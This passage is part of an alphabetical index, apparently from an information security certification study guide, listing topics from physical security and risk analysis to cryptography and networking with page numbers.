    full backup, 123
    incremental/differential backup, 123
    RAID, See Redundant array of inexpensive disks (RAID)
    SLA, 123
    system redundancy, 127
  incident response management, See Incident response management
  sensitive information/media security
    handling, 119–120
    labeling/marking, 119
    media sanitization/data destruction, 120–121
    retention, 120
    storage, 120
Orange Book, 112
Organization for Economic Cooperation and Development (OECD), 162–163
Orthogonal Frequency Division Multiplexing (OFDM), 37
P
Packet filter, 32, 32f
Passive infrared (PIR) sensor, 174
Passphrases, 9
Password Authentication Protocol (PAP), 7, 35
Password cracking, 10–11
Password hashes, 10–11
Patent, 159
Payment Card Industry Data Security Standard (PCI DSS), 113
Peer-to-peer (P2P) network, 105
Penetration test, 17–18
Perimeter defenses
  bollard, 172
  CCTV, 172
  contraband checks, 174
  dogs, 175
  doors, 174
  fences, 171
  gates, 171–172
  glass windows, 174
  guards, 175
  lights, 172
  locks, 172–173
  magnetic stripe card, 173
  mantrap, 173
  panic bars, 174
  passive infrared (PIR) sensor, 174
  photoelectric motion sensor, 174
  smart card, 173
  tailgating/piggybacking, 173
  turnstiles, 173
  ultrasonic/microwave motion detectors, 174
  walls, floors, and ceilings, 174
Permanent Virtual Circuit (PVC), 30
Personally Identifiable Information (PII), 1
Photoelectric motion sensor, 174
Physical layer, 25
Physical (environmental) security
  environmental controls
    electricity, 178
    fire suppression systems, See Fire suppression systems
    flame detectors, 179
    heat detectors, 179
    HVAC, 178–179
    personnel safety, 179
    safety awareness, 179
    safety training, 179
    smoke detectors, 179
  perimeter defenses
    bollard, 172
    CCTV, 172
    contraband checks, 174
    dogs, 175
    doors, 174
    fences, 171
    gates, 171–172
    glass windows, 174
    guards, 175
    lights, 172
    locks, 172–173
    magnetic stripe card, 173
    mantrap, 173
    panic bars, 174
    passive infrared (PIR) sensor, 174
    photoelectric motion sensor, 174
    smart card, 173
    tailgating/piggybacking, 173
    turnstiles, 173
    ultrasonic/microwave motion detectors, 174
    walls, floors, and ceilings, 174
  site design and configuration issues, 175–176
  site selection issues, 175
  system defenses
    asset tracking, 176
    drive and tape encryption, 177
    media cleaning and destruction, 177–178
    media storage and transportation, 177
    port controls, 176
Piggybacking, 173
Pipelining, 98–99
Port-Based Network Access Control, 35–36
Power-On Self-Test (POST), 102
Preaction systems, 182–183
Presentation layer, 26
Pretty good privacy (PGP), 91
Preventive controls, 142–143
Privacy
  European Union, 162
  EU-US safe harbor, 163
  OECD, 162–163
  Privacy Act, 163
  Privacy Act of 1974, 163
Privilege Attribute Certificates (PACs), 17
Process isolation, 101
Programmable Logic Device (PLD), 102
Programmable Read Only Memory (PROM), 102
Programming concepts
  assembly language, 64
  bytecode, 64
  compilers, 64
  interpreters, 64
  machine code, 63–64
  publicly released software, 64
  source code, 63–64
Proxy firewalls, 33
Public key infrastructure (PKI), 89
Q
Qualitative risk analysis, 51
Quantitative risk analysis, 51
Query language, 71
R
Radio Frequency Identification (RFID), 39, 173
Rainbow table, 6
Random access memory (RAM), 100
Rapid application development (RAD), 65
Read Only Memory (ROM), 100
Real-time Transport Protocol (RTP), 37
Reciprocal agreement, 144
Recovery Point Objective (RPO), 141–142
Recovery strategy
  cold site, 144
  hot site, 143
  mobile site, 144
  reciprocal agreement, 144
  redundant site, 143
  warm site, 143
Reduced Instruction Set Computer (RISC), 100
Redundant array of inexpensive disks (RAID)
  hamming code, 125
  mirrored set, 124
  RAID 1+0/RAID 10, 126
  striped set
    with dedicated parity, 125
    with distributed parity, 125–126
    with dual distributed parity, 126
  read and write, 124
Redundant site, 143
Religious law, 156
Remote access
  cable modems, 40
  DSL, 40
  instant messaging, 40–41
  remote desktop console access, 39
  remote meeting technology, 41
Remote Authentication Dial-In User Service (RADIUS), 6
Remote Desktop Protocol (RDP), 39
Remote Procedure Calls (RPCs), 25–26
Return on Investment (ROI), 49–50
Ring model, 96–97
Risk analysis
  ALE, 48
  ARO, 48
  asset value, 47–48
  exposure factor, 48
  SLE, 48
  assets, 45
  budget and metrics, 50
  impact, 46
  matrix, 46–47
  qualitative and quantitative, 51
  risk choices
    acceptance, 50
    avoidance, 51
    mitigating, 51
    transfer, 51
  risk management process, 51–52
  ROI, 49–50
  TCO, 48–49
  threat and vulnerability, 46
Robust Security Network (RSN), 38
Role-based access control (RBAC), 4
Rootkits, 106–107
Routers, 32
S
Secure communications
  authentication protocols and frameworks, 35–36
  desktop and application virtualization, 39–40
  remote access
    cable modems, 40
    DSL, 40
    instant messaging, 40–41
    remote desktop console access, 39
    remote meeting technology, 41
  RFID, 39
  VoIP, 37
  VPN, 36
  WLANs, See Wireless Local Area Networks (WLANs)
Secure European System for Applications in a multivendor environment (SESAME), 17
Secure/Multipurpose Internet Mail Extensions (S/MIME), 91
Secure Sockets Layer (SSL), 36, 89–90
Security architecture and design
  access control matrix, 111
  Bell-LaPadula model, 109–110
  Chinese wall model, 111
  evaluation methods
    accreditation, 113–114
    certification, 113–114
    International Common Criteria, 113
    ITSEC, 112–113
    Orange Book, 112
    PCI DSS, 113
  hardware architecture
    computer bus, 97
    CPU, See Central processing unit (CPU)
    system unit and motherboard, 97
  integrity, 110–111
  lattice-based access control, 110
  memory
    cache memory, 100
    DRAM, 101
    Firmware, 102
    hardware segmentation, 101
    process isolation, 101
    RAM, 100
    ROM, 100
    SRAM, 101
    virtual memory, 101
  operating system and software architecture
    cloud computing, 103–104
    grid computing, 104
    kernel, 102–103
    peer-to-peer (P2P) network, 105
    thin clients, 105
    virtualization, 103
  secure system design
    abstraction, 96
    layering, 95–96
    ring model, 96–97
    security domain, 96
  system threats, vulnerabilities, and countermeasures
    buffer overflows, 105
    covert channel, 105
    database security, 109
    maintenance hooks, 106
    malicious code/malware, 106–107
    mobile device attacks, 108–109
    TOCTOU/race conditions, 105
    web architecture and attacks, 107–108
Security Assertion Markup Language (SAML), 108
Separation of duties, 118
Service Level Agreements (SLA), 123, 165
Service-Oriented Architecture (SOA), 108
Shareware, 64
Side-channel attacks, 87
Simplex communication, 24
Simulation test, 147
Single Loss Expectancy (SLE), 48
Single Sign-On (SSO), 16
Smart card, 173
Smoke detectors, 179
Software development security
  application development method
    agile software development, 65
    RAD, 65
    SDLC, 65–66
    spiral model, 65
    waterfall model, 65
  CMM, 70–71
  databases
    candidate keys, 71
    definition, 71
    employee table, 71
    foreign key, 72
    integrity, 74
    normalization, 73
    query languages, 73–74
    referential, semantic, and entity, 72–73
    replication and shadowing, 74
    views, 73
  disclosure, 70
  OOP
    concepts, 67–68
    definition, 66
    ORBs, 68–69
  programming concepts
    assembly language, 64
    bytecode, 64
    compilers, 64
    interpreters, 64
    machine code, 63–64
    publicly released software, 64
    source code, 63–64
  software vulnerabilities, 69–70
Software licenses, 160
Spiral model, 65
Stateful firewalls, 32–33
Static passwords, 9
Static Random Access Memory (SRAM), 101
Switched Virtual Circuit (SVC), 30
Symmetric encryption
  AES, 83
  Blowfish and Twofish, 83
  chaining, 80
  DES, See Data Encryption Standard (DES)
  IDEA algorithm, 82
  initialization vectors, 80
  RC5 and RC6, 83
  secret key, 79
  stream and block ciphers, 80
Synchronous dynamic tokens, 11
System defenses
  asset tracking, 176
  drive and tape encryption, 177
  media cleaning and destruction, 177–178
  media storage and transportation, 177
  port controls, 176
System redundancy, 127
Systems development life cycle (SDLC), 65–66
T
Tabletop, 147
Tailgating, 173
Telecommunications and network security
  devices and protocols, See Network devices and protocols
  network architecture and design, See Network architecture and design
  secure communications, See Secure communications
Telnet, 29
Ten Commandments of Computer Ethics, 167–168
Terminal Access Controller Access Control System (TACACS), 6
Thin clients, 105
Time of Check/Time of Use (TOCTOU), 105
Total Cost of Ownership (TCO), 48–49
Trademark, 159
Trade secrets, 160
Transmission Control Protocol/Internet Protocol (TCP/IP), 28
  application layer, 27
  host-to-host transport, 27
  ICMP, 28
  internet, 26–27
  IPv4, 27–28
  IPv6, 28
  MAC addresses, 27
  network access layer, 26
  UDP, 28
Transport Layer, 25
Transport Layer Security (TLS), 36, 89–90
Trojan horse, 106
Turnstiles, 173
Type 1 authentication, 9–11
Type 2 authentication, 11
U
Ultrasonic/microwave motion detectors, 174
Unshielded Twisted Pair (UTP), 25
USA PATRIOT Act, 163–164
User Datagram Protocol (UDP), 28
V
Virtualization, 103
Virtual memory, 101
Virtual Network Computing (VNC), 39
Virtual Private Networks (VPNs), 36
Voice over Internet Protocol (VoIP), 37
Vulnerability management, 122
Vulnerability scanning, 18
W
Walkthrough drill, 147
Walls, perimeter defenses, 174
Warm site, 143
Waterfall model, 65
Wet chemicals, 181
Wide Area Network (WAN), 30
Wi-Fi Protected Access 2 (WPA2), 38
Wired Equivalent Privacy (WEP), 38
Wireless Local Area Networks (WLANs)
  802.11 abgn, 37–38
  bluetooth, 38
  FHSS, DSSS, and OFDM, 37
  802.11i, 38
  WEP, 38
Work Recovery Time (WRT), 142
X
XML, See Extensible Markup Language (XML)
XOR, See Exclusive Or (XOR)
Z
Zero-day exploits, 122
Zero-day vulnerabilities, 122
Zero knowledge test, 18